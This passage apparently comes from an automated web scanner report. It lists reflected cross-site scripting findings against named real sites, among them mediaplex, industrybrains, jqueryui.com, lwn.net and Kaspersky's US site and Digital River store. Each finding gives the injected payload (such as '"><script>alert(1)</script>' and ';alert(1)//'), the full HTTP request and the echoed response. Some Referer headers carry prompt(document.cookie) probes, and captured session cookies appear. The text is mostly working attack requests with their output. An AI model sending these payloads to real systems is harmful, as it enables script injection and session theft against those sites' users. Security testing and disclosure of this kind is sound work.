mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673");
mpck = "ht
...[SNIP]...

1.39. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab5d"%3balert(1)//95b028c6b12 was submitted in the mpvc parameter. This input was echoed as 1ab5d";alert(1)//95b028c6b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f1ab5d"%3balert(1)//95b028c6b12 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:35 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4918
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?1ab5d";alert(1)//95b028c6b12");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0
...[SNIP]...

1.40. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa8f2'%3balert(1)//0f211c345d2 was submitted in the mpvc parameter. This input was echoed as fa8f2';alert(1)//0f211c345d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3ffa8f2'%3balert(1)//0f211c345d2 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:37 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4918
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?fa8f2';alert(1)//0f211c345d2http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=8258620" target="_blank">
...[SNIP]...

1.41. http://jlinks.industrybrains.com/jsct [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dc696<script>alert(1)</script>8652984785e was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e&tr=MARKETPLACE&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:15:59 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e

1.42. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a555<script>alert(1)</script>c347c309378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp&3a555<script>alert(1)</script>c347c309378=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:16:01 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:16:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 3a555<script>alert(1)</script>c347c309378

1.43. http://jlinks.industrybrains.com/jsct [tr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4f4dc<script>alert(1)</script>88b544abd8e was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:15:59 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 86

// Error: Site 756 has no section MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e

1.44. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4299d"><script>alert(1)</script>5956202a0bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?4299d"><script>alert(1)</script>5956202a0bb=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:02:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117289

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&4299d"><script>alert(1)</script>5956202a0bb=1" type="text/css" media="all" />
...[SNIP]...

1.45. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jsc.madisonlogic.com
Path:	/jsc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 551f2<script>alert(1)</script>1434922bee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1&551f2<script>alert(1)</script>1434922bee4=1 HTTP/1.1
Host: jsc.madisonlogic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: __utma=15425322.657461619.1313187593.1313187593.1313197931.2; __utmz=15425322.1313197931.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:47:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 14:47:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 551f2<script>alert(1)</script>1434922bee4

1.46. http://lwn.net/Articles/456878/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 716e8"><script>alert(1)</script>6b13a308d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles716e8"><script>alert(1)</script>6b13a308d40/456878/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:13:56 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles716e8"><script>alert(1)</script>6b13a308d40/456878/?format=printable" rel="nofollow">
...[SNIP]...

1.47. http://lwn.net/Articles/456878/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d0e"><script>alert(1)</script>6a13f79386a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:01 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/?format=printable" rel="nofollow">
...[SNIP]...

1.48. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de815"><script>alert(1)</script>abe18a1863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1 HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:41 GMT
Server: Apache
Expires: -1
Content-Length: 18611
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<a href="/Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1?format=printable" rel="nofollow">
...[SNIP]...

1.49. http://lwn.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836fe"><script>alert(1)</script>97f2d4406c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico836fe"><script>alert(1)</script>97f2d4406c3 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: lwn.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:10 GMT
Server: Apache
Expires: -1
Content-Length: 4295
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/favicon.ico836fe"><script>alert(1)</script>97f2d4406c3?format=printable" rel="nofollow">
...[SNIP]...

1.50. https://lwn.net/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://lwn.net
Path:	/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba08"><script>alert(1)</script>a496f0dd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login7ba08"><script>alert(1)</script>a496f0dd586 HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:58 GMT
Server: Apache
Expires: -1
Content-Length: 3762
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/login7ba08"><script>alert(1)</script>a496f0dd586?format=printable" rel="nofollow">
...[SNIP]...

1.51. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224976400

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60c77--><script>alert(1)</script>8fd004d51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/kasperus/en_US/buy/productID.224976400?60c77--><script>alert(1)</script>8fd004d51c5=1 HTTP/1.1
Host: store.digitalriver.com
Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; ORA_WX_SESSION="10.2.2.97:772-0#0"; JSESSIONID=DFC074834E717E721063668DDA488A72; VISITOR_ID=971D4E8DFAED4367B7156331573704A34236C16992AB1AF2; BIGipServerp-drh-dc2pod9-pool2-active=1627521546.772.0000; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66802880292,0)
Date: Sun, 04 Sep 2011 12:36:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app96
Content-Length: 144211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>8fd004d51c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=701de6e5&Env=BASE&Locale=en_US&SiteID=kasperus&StyleID=22810400&StyleVersion=41&ceid=175598900&cename=TopHeader&id=ShoppingCartPage&productID=224976400&scrip
...[SNIP]...

1.52. http://usa.kaspersky.com/ [domain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a54d2"><script>alert(1)</script>6a31e0ff9e9 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:18:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138695"
Content-Type: text/html; charset=utf-8
Content-Length: 49581
Date: Sun, 04 Sep 2011 12:18:20 GMT
X-Varnish: 1163043182
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9" />
...[SNIP]...

1.53. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6626"><script>alert(1)</script>ccf8d1d548d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:18:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138728"
Content-Type: text/html; charset=utf-8
Content-Length: 49591
Date: Sun, 04 Sep 2011 12:18:53 GMT
X-Varnish: 1163044152
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1" />
...[SNIP]...

1.54. http://usa.kaspersky.com/about-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3511f"><script>alert(1)</script>455d50a023f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us3511f"><script>alert(1)</script>455d50a023f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
